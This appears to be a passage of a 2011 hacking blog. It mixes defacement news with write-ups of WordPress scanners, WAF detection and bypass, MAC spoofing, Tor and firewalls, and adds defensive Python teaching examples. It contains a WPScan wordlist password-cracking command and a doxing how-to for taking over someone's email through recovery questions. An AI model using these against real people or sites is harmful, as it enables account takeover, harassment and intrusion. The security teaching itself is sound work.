Hacking


Thursday, December 8, 2011

DNS Cache Poisoning Attack on Google, Gmail, Yahoo, YouTube






A hacker going by the nickname AlpHaNiX defaced the Democratic Republic of Congo (.cd) domains of Google, Gmail, YouTube, Yahoo, Apple and others. The technique used is known as DNS cache poisoning.

What is Cache Poisoning?

Cache poisoning, also called domain name system (DNS) poisoning or DNS cache poisoning, is the corruption of an Internet server's DNS table by replacing a legitimate Internet address with a rogue one. When a web user requests the page at that name, the rogue entry in the table redirects the request to a different address. At that point a worm, spyware, a browser-hijacking program or other malware can be downloaded to the user's computer from the rogue location.




The defaced websites were:

http://apple.cd/
http://yahoo.cd/
http://gmail.cd/
http://google.cd/
http://youtube.cd/
http://linux.cd/
http://samsung.cd/
http://hotmail.cd/
http://microsoft.cd/
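The checks a cache should apply before trusting a reply, as an added example that is not part of the original post: the resolver matches the transaction ID, destination port and question of each reply against the query it actually sent, and caches only records inside the queried server's bailiwick, so a forged reply or a smuggled record never reaches the table. All names, ports and addresses are constructed.

```python
"""Added example (not from the original post): a toy resolver cache that
checks a reply against the query it is waiting for before caching anything.
Names, ports and addresses are constructed sample values."""
from dataclasses import dataclass, field
import secrets


@dataclass
class Query:
    txid: int
    src_port: int        # ephemeral port the resolver sent the query from
    qname: str
    qtype: str
    bailiwick: str       # zone the queried server is authoritative for


@dataclass
class Reply:
    txid: int
    dst_port: int        # port the reply was addressed to
    qname: str
    qtype: str
    answers: dict = field(default_factory=dict)      # name -> address
    additional: dict = field(default_factory=dict)   # "glue" records


def in_bailiwick(name: str, zone: str) -> bool:
    """True if `name` lies inside `zone`; records outside it are never cached."""
    name, zone = name.rstrip(".").lower(), zone.rstrip(".").lower()
    return name == zone or name.endswith("." + zone)


class ResolverCache:
    def __init__(self):
        self.cache = {}      # name -> address: the post's "DNS table"
        self.pending = {}    # (txid, src_port) -> outstanding Query

    def send_query(self, qname, qtype, bailiwick):
        # Random txid and source port: a forger has to guess both (about
        # 32 bits together) to get past the first check in receive().
        q = Query(secrets.randbelow(1 << 16), 1024 + secrets.randbelow(64511),
                  qname, qtype, bailiwick)
        self.pending[(q.txid, q.src_port)] = q
        return q

    def receive(self, r: Reply) -> str:
        q = self.pending.get((r.txid, r.dst_port))
        if q is None:
            return "rejected: txid/port do not match an outstanding query"
        if (r.qname.lower(), r.qtype) != (q.qname.lower(), q.qtype):
            return "rejected: question section mismatch"
        for name, value in list(r.answers.items()) + list(r.additional.items()):
            # Bailiwick rule: a server for example.com may not tell us where
            # some unrelated name lives, even inside an otherwise valid reply.
            if in_bailiwick(name, q.bailiwick):
                self.cache[name.lower()] = value
        del self.pending[(r.txid, r.dst_port)]
        return "accepted"


def demo():
    """Walk one query through a forged reply and then a genuine one."""
    rc = ResolverCache()
    q = rc.send_query("www.example.com", "A", "example.com")
    # A forged reply that guessed the transaction id wrong never reaches the cache.
    forged = Reply((q.txid + 1) % 65536, q.src_port, "www.example.com", "A",
                   answers={"www.example.com": "203.0.113.66"})
    r1 = rc.receive(forged)
    # A genuine reply, but with an unrelated record smuggled into the additional
    # section: the answer is cached, the out-of-bailiwick record is dropped.
    genuine = Reply(q.txid, q.src_port, "www.example.com", "A",
                    answers={"www.example.com": "192.0.2.10"},
                    additional={"www.example.net": "203.0.113.66"})
    r2 = rc.receive(genuine)
    return r1, r2, dict(rc.cache)


if __name__ == "__main__":
    print(demo())
```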

Mantra - Open Source Security Framework

Mantra is a collection of hacker tools, add-ons and scripts built on Firefox.

Firefox has been a hacker-friendly tool from the start; its richest assets are its add-ons, but until now they have only worked as independent tools.

A group of security professionals integrated these add-ons and scripts into a framework called Mantra. As of now Mantra is more a security toolkit than a full-fledged framework.

Some of the features of Mantra:

1. It's built on top of the browser, which saves a lot of manpower and flattens the learning curve.
2. It is cross-platform and flexible: it runs natively on Windows, Mac and Linux.
3. It's open source, so you are free to use it or modify it your own way.

Mantra can be used in all five phases of an attack: reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access and covering tracks.

Download

The Mantra framework is available for Linux and Windows.

You can download it from http://www.getmantra.com/download

**Studied from clubhack




Sunday, November 20, 2011

Maharashtra Highway Police Website Got Hacked





It is not only international law enforcement and police sites that are under attack by hackers; our local police websites and databases also fall victim to breaches, roughly once a day.

A hacker going by the name "powerin10" has claimed responsibility for hacking the Maharashtra Highway Police website. A mirror of this hack is available here.

The hacker is a member of Bangladesh Cyber Army.

Saturday, October 29, 2011

WPScan - Wordpress Security Scanner







WPScan is a vulnerability scanner that checks the security of WordPress installations using a black-box approach. It is written in Ruby.

The features of WPScan are:

  Username enumeration
  Weak password cracking
  Plugin vulnerability enumeration
  Version enumeration
  Vulnerability enumeration
  and more

It can be downloaded free from http://code.google.com/p/wpscan/

OR

It is available in BackTrack 5 under /pentest/web/wpscan/

Syntax:
         ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50


Plecost - Wordpress fingerprint tool

Plecost

A WordPress fingerprinting tool, open source and shipped with BackTrack 5.

Plecost retrieves information from the website being analyzed and can also search the results indexed by Google.

It bases its analysis on information contained in the development files shipped with WordPress and its plugins. The plugin list is generated from the "Most popular" list on wordpress.org and linked to the related entries at cve.mitre.org.

Plecost is available at http://code.google.com/p/plecost

Plecost fingerprints the installed plugins and also reports the corresponding CVE entries.

Syntax:

     ./plecost-0.2.2-9-beta.py -i wp_plugin_list.txt http://www.example.com -G



Friday, October 28, 2011

WafW00f - A Web Application Audit Tool


WAFW00F - Web Application Firewall Detection Tool

WafW00f is written in Python and is available freely on the net.

The tool was developed by Sandro Gauci and Wendel G. Henrique.

They note that Web Application Firewalls (WAFs):
  • can be detected, because they leave several signs
  • can be bypassed by changing the attack in order to avoid rules
To help detect and bypass WAFs, they released wafw00f.

WAFW00F allows one to identify and fingerprint the WAF products protecting a website.

Download link (SVN trunk):

http://waffit.googlecode.com/svn/trunk/ waffit-read-only

It is also included in BackTrack 5 R1, under /pentest/web/waffit/


example 1: /pentest/web/waffit# ./wafw00f.py http://www.example.com

output:

Checking http://www.example.com
Generic Detection results:
No WAF detected by the generic detection

example 2: /pentest/web/waffit# ./wafw00f.py http://www.example2.com

output:

Checking http://www.example2.com
The site http://www.example2.com is behind a Citrix NetScaler



Wednesday, October 19, 2011

Google offers encrypted Web search by default

Google announced today that it will encrypt Web searches and results by default for users who are signed in.

People who don't have a Google account or are signed out can go directly to https://www.google.com, the company said in a blog post.

Encrypting the communications between an end user and the Google search engine servers will protect against snooping by anyone who might be sniffing on an unsecured Wi-Fi network, for instance. Secure Sockets Layer (SSL) is available now for Web search, image search and all the search modes except for Maps, Google said in this separate post.

For example, when you search over SSL for "dogs," Google encrypts the search and results that are returned, but clicking on a result ends the encrypted connection unless the destination is on "https://."

"Although SSL offers clear privacy and security benefits, it does not protect against all attacks. The benefits of SSL depend on your browser's list of trusted root certificates, the security of the organizations that issue those certificates, and the way in which you and your browser handle certificate warnings," Google says. "In addition, while the connection between your computer and Google will be encrypted, if your computer is infected with malware or a keylogger, a third party might also be able to see the queries that you typed directly."

Google began SSL default in Gmail in January 2010 and began offering an encrypted search option four months later.

Originally posted at InSecurity Complex

Tuesday, June 7, 2011

Mobile Malware Is on the Rise, but Is It a Real Threat?


Smartphones and tablets may be the hottest tickets in electronics today, but with that marquee status comes a dark side. Mobile viruses are on the rise, and 2010 saw a huge increase in malware on mobile devices, up 46 percent from 2009, says a new threat report from security software maker McAfee.

The increase in mobile malware isn't unexpected, as smartphones have become more popular in the last year, with smartphones recently passing PCs in sales for the first time ever. Adam Wosotowsky, an engineer at McAfee, says Symbian is the most at-risk mobile platform, though Google Android devices and jailbroken iPhones are popular targets, too.

"I wouldn't call it unexpected," he says. "We've seen mobile malware growing exponentially year-over-year for a while. It's much more of a big deal now that smartphones are basically becoming little computers."

Besides being greater in number, mobile malware is getting more sophisticated, Wosotowsky says. Viruses that infect cell phones typically force the phone to do things like send texts or make calls to specific numbers and at specific times so the malware creator profits. Now that phones are capable of so much more, the viruses that infect them are following suit.

"There are a lot more ways for the criminal enterprise to make money," he says. "You have the ability to infect the phones and actually build some kind of botnet infrastructure. We have seen indications of ways to start to establish command and control [on phones]."

Seeing "indications" and seeing a virus are two different things, however. Ondrej Vlcek, CTO of Avast, a security software company that gives away its product, says the mobile malware threat, while a problem, isn't anywhere near as threatening as malware on PCs.

"It's still relatively small compared to the traditional platforms," Vlcek says. "Also, the payloads are usually less invasive—sort of like Windows malware ten, fifteen years ago."

Vlcek is on board with the McAfee report's conclusions about the vulnerabilities with Adobe products, however. The report says malware developers "heavily" exploited weaknesses in Flash and PDF applications. Flash videos are especially ripe targets, Wosotowsky says, since the application runs code on both the client and server sides.

"Flash is extremely popular and everybody's using it. That makes it a big target," he says. "I'm sure Adobe is going to re-architect some of the security that's associated with it."

Friday, June 3, 2011

What Is Doxing? – Doxing And Its Uses

Doxing is the process of gaining information about someone or something by using sources on the Internet and basic deduction skills. Its name is derived from "documents", and in short it is the retrieval of "documents" on a person or company.

You're probably thinking, "Okay, so basically it's getting information by searching someone's email on Google, right?" In a sense, yes, but there are actually easier ways to get someone's information online. The most popular and most common method is to use a website called Pipl (http://www.pipl.com/). Pipl allows you to search for full names, emails, usernames and even phone numbers, which makes it a very useful tool for hackers. Another source hackers can use is Facebook (http://www.facebook.com). Sure, Facebook allows full-name searches, but most hackers aren't using it for its name search; they're using it for its email search.

The main goal when doxing is to find the target's email (if you don't have it). Your email is essentially your passport online: you sign up for websites with it, you have personal information on it, and if someone has access to it they can essentially pretend to be you online. Once the hacker has the email, all he has to do is put it into Facebook or Pipl and he will be able to find you, assuming the email he has is connected to some account you have online. On the flipside, in order to find your email, the hacker either has to guess it, befriend you on Facebook, or hack one of your vulnerable friends and view your email that way. Once he's done that, you're in trouble.

Now, you're probably thinking, "How's he going to hack me with just my email?" Well, that's where doxing comes in handy. If he can view your Facebook account, or can find some other bit of information about you using Pipl, he can do what's called reverting. Reverting is the process of using the target's email recovery questions to gain access to the target's email. Now, you may be thinking, "How's he gonna guess my recovery question answers?" Well, take a second look at your recovery questions and ask yourself, "Can someone find this answer online?" If you answered yes, then you're vulnerable to reverting.

Any hacker reading this who didn't previously know about reverting would probably look at this and say, "This would never work!" But you have to remember… we're all human, and we all make mistakes. Surprisingly, this method works more often than you'd think, but it is not for anyone who is lazy. Doxers tend to spend a while searching around the web for information that they can use.

Chances are, you’ve made some mistakes online, and if a skilled Doxer finds that mistake, then you’re in trouble. The Doxing method is based purely on the ability of the hacker to recognize valuable information about his target and use this information to his benefit. It is also based around the idea that, “The more you know about your target, the easier it will be to find his or her flaws.”

How can you ensure that you won't be doxed? Well, as the Internet becomes more and more useful and addictive, it will become harder not to get doxed. The main issue for most victims is their security questions and their password security. If a victim has a very easy-to-find recovery answer, the victim can be reverted within a matter of seconds. Also, if the victim has a simple password, it could be brute-forced simply by using a wordlist built from the victim's interests, likes and fancies (of course, this method is not as popular).

So, the main rule to not getting hacked is: Have secure passwords, and almost impossible to guess recovery questions. The main rule to not getting Doxed is… to just stay off the Internet; but, who wants to do that?


Thursday, June 2, 2011

How to Change MAC Address

In computer networking, the Media Access Control (MAC) address is every bit as important as an IP address. This article explains how MAC addresses work and how to find the MAC addresses a computer is using.

What Is a MAC Address?

The MAC address is a unique value associated with a network adapter. MAC addresses are also known as hardware addresses or physical addresses. They uniquely identify an adapter on a LAN.

MAC addresses are 12-digit hexadecimal numbers (48 bits in length). By convention, MAC addresses are usually written in one of the following two formats:

MM:MM:MM:SS:SS:SS


MM-MM-MM-SS-SS-SS

The first half of a MAC address contains the ID number of the adapter manufacturer. These IDs are regulated by an Internet standards body. The second half of a MAC address represents the serial number assigned to the adapter by the manufacturer. In the example,

00:A0:C9:14:C8:29

The prefix

00A0C9

indicates the manufacturer is Intel Corporation.

How to find MAC Address?

Go to Start -> Run, type cmd and press Enter.

A DOS window will appear. This is also commonly called a Command Prompt.

Now type IPCONFIG /ALL at the command prompt and hit ENTER. The window will display the configuration of all of your network adapters. If you have multiple network adapters in your PC you'll see multiple addresses. The MAC address you're looking for is listed under the heading Ethernet Adapter.

Look for the Physical Address. It should look something like 00-50-BA-D1-BA-71.

To close the window when you are finished, type EXIT at the command prompt and hit the ENTER key.

How to change MAC Address?

Go to Start > Control Panel > Network and Internet Connections, then right-click the network connection whose network card's MAC address you want to change and click Properties.

In the General tab, click the Configure button.

Then click the Advanced tab.

In the Property section you should see an option named Network Address or Locally Administered Address. Select it and switch the radio button to Value (Not Present means that your network card will use the default MAC address programmed by the manufacturer).

Now type in a new MAC address and click OK.

Restart the computer.

To make sure that the change was successful, open a command prompt (Start > Run, type cmd and click OK) and type ipconfig /all.
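As an added example (not from the original post), the following Python parses a MAC address in either notation shown above, splits it into the manufacturer (OUI) and serial halves, and reads the two flag bits of the first octet, one of which marks an address set by software or an administrator rather than burned in by the manufacturer; that bit is what the "Locally Administered Address" option above toggles, so it is also how a defender spots a changed address in inventory data. The OUI table holds only the Intel prefix quoted above and the ipconfig text is a constructed sample.

```python
"""Added example (not from the original post): parse a MAC address written in
either convention above, split it into the manufacturer prefix (OUI) and the
adapter serial half, and read the flag bits an administrator-set address
reveals.  The OUI table and the ipconfig text are constructed samples."""
import re

SAMPLE_OUI_TABLE = {"00A0C9": "Intel Corporation"}   # constructed: only the prefix quoted above


def parse_mac(text: str) -> bytes:
    """Accept MM:MM:MM:SS:SS:SS or MM-MM-MM-SS-SS-SS and return the six raw bytes."""
    text = text.strip()
    seps = {c for c in text if c in ":-"}          # exactly one separator style allowed
    parts = re.split(r"[:-]", text)
    if len(seps) != 1 or len(parts) != 6 or not all(re.fullmatch(r"[0-9A-Fa-f]{2}", p) for p in parts):
        raise ValueError(f"not a MAC address: {text!r}")
    return bytes(int(p, 16) for p in parts)


def describe(text: str) -> dict:
    raw = parse_mac(text)
    oui = raw[:3].hex().upper()
    first = raw[0]
    return {
        "canonical": ":".join(f"{b:02X}" for b in raw),
        "oui": oui,
        "serial": raw[3:].hex().upper(),
        "vendor": SAMPLE_OUI_TABLE.get(oui, "not in sample table"),
        # Bit 0 of the first octet: group (multicast) address rather than one adapter.
        "multicast": bool(first & 0x01),
        # Bit 1 of the first octet: "locally administered", i.e. set by software or
        # an administrator (as in the procedure above) rather than by the manufacturer.
        "locally_administered": bool(first & 0x02),
    }


IPCONFIG_SAMPLE = """\
Ethernet adapter Local Area Connection:

   Description . . . . . . . . . . . : Sample Ethernet Adapter
   Physical Address. . . . . . . . . : 00-50-BA-D1-BA-71
   DHCP Enabled. . . . . . . . . . . : Yes
"""   # constructed, in the layout of `ipconfig /all`


def physical_addresses(ipconfig_output: str) -> list:
    """Pull every Physical Address value out of ipconfig /all output."""
    return re.findall(r"Physical Address[ .]*: *([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})",
                      ipconfig_output)


if __name__ == "__main__":
    for mac in physical_addresses(IPCONFIG_SAMPLE):
        print(describe(mac))
```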

Friday, May 20, 2011

White hat hacker exposes NASA servers' vulnerabilities


A Romanian "white hat" hacker has claimed to have broken into a site of the National Aeronautics and Space Administration (NASA), and published a screenshot of the compromised server on his site.

White hat hackers are programmers who break into computer systems for the sake of exposing security flaws, instead of exploiting them for malevolent purposes.

In this case, "TinKode" hacked a file transfer protocol (FTP) server related to NASA's Earth Observation System at Goddard Space Flight Center.

"I don't do bad things. I only find and make public the info. Afterwards I send an email to them to fix the holes. It's like an security audit, but for free," TinKode said in an interview posted on NetworkWorld.

The NetworkWorld story said that, after hacking into servir.gsfc.nasa.gov, TinKode sent an email alert of the hack to NASA's webmaster.

His screenshot shows folders like RADARSAT, ASAR, ASAR_Aus, ASAR_Africa, and ASAR_Haiti.

ASAR is short for Advanced Synthetic Aperture Radar, a technology used by NASA.

One month ago, TinKode exposed a similar security hole at another space agency by hacking into a server operated by the European Space Agency at www.esa.int.

He then leaked a list of FTP accounts, email addresses and passwords for administrators and editors.

Early this year, TinKode and hackers Ne0h and Jackh4x0r hacked into the Web servers hosting MySQL.com, proving it was vulnerable to SQL injection as well as XSS.

In the NetworkWorld interview, TinKode said making the breaches public makes the companies fix the vulnerability faster.

He also said finding security holes is a "hobby" for him.

"I am doing this because finding security holes represents a hobby for me. If someone wants to hire me, we can discuss, isn't a problem," he said.

Thursday, May 19, 2011

Private and Public IP Addresses

What are Private and Public IP Addresses


Internet Protocol (IP) addresses are usually of two types: public and private. If you have ever wondered what the difference is between a public and a private IP address, you are in the right place. In this post I will try to explain the difference in layman's terms so that it is simple and easy to understand.



What are Public IP Addresses?

A public IP address is assigned to every computer that connects to the Internet, and each such IP is unique: there cannot be two computers with the same public IP address anywhere on the Internet. This addressing scheme makes it possible for computers to "find each other" online and exchange information. The user has no control over the public IP address assigned to the computer; it is assigned by the Internet Service Provider as soon as the computer connects to the Internet gateway.

A public IP address can be either static or dynamic. A static public IP address does not change and is used primarily for hosting webpages or services on the Internet. On the other hand a dynamic public IP address is chosen from a pool of available addresses and changes each time one connects to the Internet. Most Internet users will only have a dynamic IP assigned to their computer which goes off when the computer is disconnected from the Internet. Thus when it is re-connected it gets a new IP.

You can check your public IP address by visiting www.whatismyip.com

What are Private IP Addresses?

An IP address is considered private if the IP number falls within one of the IP address ranges reserved for private networks such as a Local Area Network (LAN). The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private networks (local networks):

10.0.0.0 – 10.255.255.255 (Total Addresses: 16,777,216)
172.16.0.0 – 172.31.255.255 (Total Addresses: 1,048,576)
192.168.0.0 – 192.168.255.255 (Total Addresses: 65,536)

Private IP addresses are used for numbering the computers in a private network, including home, school and business LANs and those in airports and hotels, which makes it possible for the computers in the network to communicate with each other. For example, if a network X consists of 10 computers, each of them can be given an IP from 192.168.1.1 to 192.168.1.10. Unlike with public IPs, the administrator of the private network is free to assign IP addresses of his own choice (provided the IP number falls in one of the private ranges mentioned above).

Devices with private IP addresses cannot connect directly to the Internet. Likewise, computers outside the local network cannot connect directly to a device with a private IP. It is possible to interconnect two private networks with the help of a router or a similar device that supports Network Address Translation.

If the private network is connected to the Internet (through an Internet connection via an ISP) then each computer will have a private IP as well as a public IP. The private IP is used for communication within the network, whereas the public IP is used for communication over the Internet. Most Internet users with a DSL/ADSL connection will have both a private and a public IP.

You can know your private IP by typing ipconfig command in the command prompt. The number that you see against “IPV4 Address:” is your private IP which in most cases will be 192.168.1.1 or 192.168.1.2. Unlike the public IP, private IP addresses are always static in nature.

Unlike what most people assume, a private IP is neither the one which is impossible to trace (just like the private telephone number) nor the one reserved for stealth Internet usage. In reality there is no public IP address that is impossible to trace since the protocol itself is designed for transparency.
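To tie the three blocks above to their address counts, and to show why a host with only a private IP cannot be reached from outside, here is an added example that is not part of the original post: it classifies addresses with Python's ipaddress module and models the port-translating NAT that a DSL router performs between the private and public sides. All addresses are constructed from the documentation ranges.

```python
"""Added example (not from the original post): classify IPv4 addresses against
the three private blocks listed above, check the address counts the post gives,
and model the NAT step that lets a private host reach the Internet while
keeping it unreachable from outside.  All addresses are constructed samples
from the documentation ranges."""
import ipaddress

PRIVATE_BLOCKS = [ipaddress.ip_network(cidr) for cidr in
                  ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def block_summary():
    """(first address, last address, total addresses) for each private block."""
    return [(str(n.network_address), str(n.broadcast_address), n.num_addresses)
            for n in PRIVATE_BLOCKS]


def is_private(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in PRIVATE_BLOCKS)


class Nat:
    """Port address translation: many private hosts share one public IP."""

    def __init__(self, public_ip: str, first_port: int = 40000):
        self.public_ip = public_ip
        self.next_port = first_port
        self.mappings = {}   # public port -> (priv_ip, priv_port, dst_ip, dst_port)

    def outbound(self, src_ip, src_port, dst_ip, dst_port):
        """Rewrite a packet leaving the LAN; returns (src, sport, dst, dport) as seen on the Internet."""
        if not is_private(src_ip):
            raise ValueError("only private sources are translated")
        if is_private(dst_ip):
            raise ValueError("a private destination is not routable over the Internet")
        key = (src_ip, src_port, dst_ip, dst_port)
        for port, mapped in self.mappings.items():
            if mapped == key:                      # reuse an existing mapping
                return (self.public_ip, port, dst_ip, dst_port)
        port = self.next_port
        self.next_port += 1
        self.mappings[port] = key
        return (self.public_ip, port, dst_ip, dst_port)

    def inbound(self, src_ip, src_port, dst_port):
        """A packet from the Internet is delivered only if it answers an existing mapping."""
        mapped = self.mappings.get(dst_port)
        if mapped is None or (mapped[2], mapped[3]) != (src_ip, src_port):
            return None   # unsolicited: no private host is reachable this way
        return (src_ip, src_port, mapped[0], mapped[1])


def demo():
    nat = Nat("203.0.113.5")                              # the ISP-assigned public IP
    out = nat.outbound("192.168.1.2", 51515, "198.51.100.7", 80)
    reply = nat.inbound("198.51.100.7", 80, out[1])       # answer to that connection
    stray = nat.inbound("198.51.100.7", 80, out[1] + 1)   # nobody asked for this one
    return out, reply, stray


if __name__ == "__main__":
    print(block_summary())
    print(demo())
```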

Tuesday, May 10, 2011

Surf Web Anonymously with TOR


What is TOR ?

Tor-proxy is a free proxy-server service that Internet users can use to hide their IP address while surfing the Web. An IP address is a number used to identify computers on the Internet, and for reasons of safety and security, it may sometimes be desirable to hide the address.

What is Vidalia ?
Vidalia is a GUI (graphical user interface) for Tor. It allows the user to start, stop and view the status of Tor; monitor bandwidth usage; view, filter and search log messages; and configure some aspects of Tor.

Difference between an Anonymous Proxy and Tor-proxy

You may be wondering why Tor is needed when the same thing can be done with an anonymous proxy. To clear that up, let's look at how an anonymous proxy and Tor work.

Working of an anonymous proxy

In the above example we connect to the web server through a proxy server, so the proxy hides our identity by acting as an intermediary between us and the web server we are accessing. But what if the owner of the proxy server starts revealing our identity? We cannot be sure which proxy server to rely on to stay anonymous.


Working of Tor-proxy


Tor works at a deeper level, dealing with a computer's sockets directly. I will not go too deep into it, as most readers would find the explanation hard to follow. In simple words, the Tor network uses a distributed network of nodes, run by other Tor users, to re-route all the packets from your network. What this means is that no single link can identify both the source and the destination.

In the above example the client passes through three different servers or nodes before reaching the actual web server. The path taken by the client is denoted by green arrows

Node 1 knows the actual origin (client) but not the actual destination (web server).
Node 5 knows neither the actual origin nor the actual destination.
Node 9 knows the actual destination but not the actual origin.

Thus no one exactly knows which client is accessing which web server. So it is highly anonymous.

Using Tor and vidalia to surf the web Anonymously :-

1. First download and install the Tor bundle, which includes Tor and Vidalia, from Here; to get the password click Here

2. Open the Tor bundle and check all components as shown, then follow the on-screen instructions to finish the installation.

3. Now open the Vidalia Control Panel from the taskbar and click Start Tor.

4. Now open the Mozilla Firefox browser and click the red "Tor Disabled" indicator at the right-hand corner of the browser; it will turn green and say "Tor Enabled".

To check whether you're behind a proxy, go to www.whatismyip.com; you will see a different IP address after setting up Tor.

Disadvantages of Tor :-

Since traffic passes through multiple Tor nodes, the Internet connection can be slow. Even so, Tor is not entirely safe; there are potential pitfalls and security threats. Tor by itself does not encrypt the payload beyond the exit node, so a sniffer at the exit node can gather all the information, as shown.

So unless the application encrypts its data (using SSL), all the information can be gathered from the exit node with a sniffer.

**This post is taken from hackhaholic
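The three-node walk above, as an added example that is not part of the original post: a toy onion-routing simulation in which the client wraps its request once per node, each node learns only who handed it the packet and where to send it next, and the exit node sees the request in the clear unless the application encrypted it first (the post's SSL caveat). The SHA-256 keystream stands in for a real cipher, and node names, keys and the request are constructed.

```python
"""Added example (not from the original post): a simulation of the three-hop
circuit described above.  The client wraps its request in one layer per node;
each node strips its own layer and learns only its two neighbours, and the exit
node sees the request in the clear unless the application encrypted it first.
The keystream is a SHA-256 toy standing in for a real cipher; node names, keys
and the request are constructed."""
import hashlib
import json


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Toy symmetric cipher: XOR with SHA-256(key || block counter). Not for real use."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + i.to_bytes(4, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[i:i + 32], block))
    return bytes(out)


class Node:
    def __init__(self, name: str, key: bytes):
        self.name, self.key = name, key
        self.seen = {}   # everything this node learns about the circuit

    def peel(self, came_from: str, blob: bytes):
        """Remove this node's layer; return the next hop and what to forward."""
        layer = json.loads(keystream_xor(self.key, blob))
        self.seen = {"from": came_from, "next": layer["next"]}
        return layer["next"], bytes.fromhex(layer["payload"])


def build_onion(route, destination: str, request: bytes) -> bytes:
    """Encrypt for the exit node first, then wrap that for each earlier node."""
    blob, next_hop = request, destination
    for node in reversed(route):
        layer = json.dumps({"next": next_hop, "payload": blob.hex()}).encode()
        blob, next_hop = keystream_xor(node.key, layer), node.name
    return blob


def run_circuit(client: str, route, destination: str, request: bytes):
    """Pass the onion along the route; returns where the exit sends it, and what."""
    came_from, blob = client, build_onion(route, destination, request)
    for node in route:
        next_hop, blob = node.peel(came_from, blob)
        came_from = node.name
    return next_hop, blob


def demo(app_encrypted: bool = False):
    request = b"GET /search?q=dogs HTTP/1.1"
    if app_encrypted:
        # Stand-in for SSL between browser and web server: the exit node then
        # forwards ciphertext it has no key for.
        request = keystream_xor(b"browser-server session key", request)
    route = [Node("node1", b"k1"), Node("node5", b"k5"), Node("node9", b"k9")]
    destination, leaves_exit = run_circuit("client", route, "webserver", request)
    return {
        "destination": destination,
        "exit_sees_plaintext": leaves_exit == b"GET /search?q=dogs HTTP/1.1",
        **{n.name: n.seen for n in route},
    }


if __name__ == "__main__":
    print(demo())
    print(demo(app_encrypted=True))
```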

Wednesday, May 4, 2011

How Firewall Works






If you have been using the Internet for any length of time, and especially if you work at a larger company and browse the Web while you are at work, you have probably heard the term firewall used. For example, you often hear people in companies say things like, "I can't use that site because they won't let it through the firewall."

How Firewalls Work

Firewalls are basically a barrier between your computer and the Internet. A firewall can be compared to a security guard who stands at the entrance of your house and filters the visitors coming to your place: he may allow some visitors to enter while denying others whom he suspects of being intruders. Similarly, a firewall is a software program or a hardware device that filters the information coming from the Internet, in the form of packets, to your personal computer or computer network.

Firewalls decide whether to allow or block network traffic between devices based on rules that are pre-configured or set by the firewall administrator. Most personal firewalls, such as the Windows firewall, operate on a set of pre-configured rules that are suitable under normal circumstances, so that the user need not worry much about configuring the firewall.

Personal firewalls are easy to install and use and hence preferred by end users on their personal computers. Large networks and companies, however, prefer firewalls with plenty of configuration options to meet their customized needs. For example, a company may set up different firewall rules for FTP servers, Telnet servers and web servers. In addition, the company can control how employees connect to the Internet by blocking access to certain websites or restricting the transfer of files to other networks. Thus, in addition to security, a firewall gives the company tremendous control over how people use the network.

Firewalls use one or more of the following methods to control the incoming and outgoing traffic in a network:

1. Packet Filtering: In this method packets (small chunks of data) are analyzed against a set of filters. Packet filters have a set of rules with accept and deny actions, which are pre-configured or can be configured manually by the firewall administrator. If the packet makes it through these filters it is allowed to reach its destination; otherwise it is discarded.
2. Stateful Inspection: This is a newer method that doesn't analyze the contents of the packets. Instead it compares certain key aspects of each packet to a database of trusted sources. Both incoming and outgoing packets are compared against this database and, if the comparison yields a reasonable match, the packets are allowed to travel further. Otherwise they are discarded.

Firewall Configuration

Firewalls can be configured by adding one or more filters based on several conditions, as mentioned below:

1. IP addresses
If an IP address outside the network is found to be unfavorable, it is possible to set a filter to block all traffic to and from that IP address. For example, if a certain IP address is found to be making too many connections to a server, the administrator may decide to block traffic from this IP using the firewall.

2. Domain names
Since it is difficult to remember IP addresses, it is easier and smarter to configure firewalls by adding filters based on domain names. By setting up a domain filter, a company may decide to block all access to certain domain names, or to provide access only to a list of selected domain names.

3. Ports/Protocols
Every service running on a server is made available to the Internet using numbered ports, one for each service. In simple words, ports can be compared to virtual doors of the server through which services are made available. For example, if a server is running a web (HTTP) service it will typically be available on port 80, and to use this service the client needs to connect to the server via port 80. Similarly, services such as Telnet (port 23), FTP (port 21) and SMTP (port 25) may be running on the server. If the services are intended for the public, they are usually kept open; otherwise they are blocked using the firewall so as to prevent intruders from using the open ports to make unauthorized connections.

4. Specific words/phrases
A firewall can be configured to filter one or more specific words or phrases, so that both incoming and outgoing packets are scanned for the words in the filter. For example, you may set up a firewall rule to filter any packet that contains an offensive term or phrase that you decide to block from entering or leaving your network.

Hardware vs Software Firewalls

Hardware firewalls provide a higher level of security and hence are preferred for servers where security has the top priority, whereas software firewalls are less expensive and are preferred on home computers and laptops. Hardware firewalls usually come as a built-in unit of a router and provide maximum security, as they filter each packet at the hardware level before it even reaches your computer. A good example is the Linksys Cable/DSL router.

Why a Firewall?

Firewalls provide protection against a number of online threats such as remote login, Trojan backdoors, session hijacking, DoS and DDoS attacks, viruses, cookie stealing and many more. The effectiveness of the protection depends on the way you configure the firewall and how you set up the filter rules. However, major threats such as DoS and DDoS attacks may sometimes manage to bypass the firewall and damage the server. Even though a firewall is not a complete answer to online threats, it can handle attacks effectively and protect the computer to the greatest extent possible.
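The four filter kinds and the stateful check above, as an added example that is not part of the original post: a small Python packet filter with a first-match, default-deny rule table, plus a connection table so that replies to a connection the LAN opened are admitted without needing an inbound rule of their own. Addresses, rules and packets are constructed samples.

```python
"""Added example (not from the original post): a packet filter that applies
the filter kinds listed above (IP address, domain name, port/protocol and
words) in order with a default-deny policy, plus the stateful shortcut that
lets replies to a connection the LAN opened come back in.  Rules, addresses
and packets are constructed samples."""
from dataclasses import dataclass
from typing import Optional, Tuple
import ipaddress


@dataclass
class Packet:
    direction: str      # "in" (from the Internet) or "out" (from the LAN)
    src: str
    sport: int
    dst: str
    dport: int
    proto: str = "tcp"
    host: str = ""      # domain name the client asked for, when known
    payload: str = ""


@dataclass
class Rule:
    action: str                          # "accept" or "deny"
    direction: str = "any"
    src: str = "any"                     # CIDR block or "any"
    proto: str = "any"
    dport: Optional[int] = None          # None = any port
    host_suffix: Optional[str] = None    # domain-name filter
    words: Tuple[str, ...] = ()          # content filter, matched case-insensitively

    def matches(self, p: Packet) -> bool:
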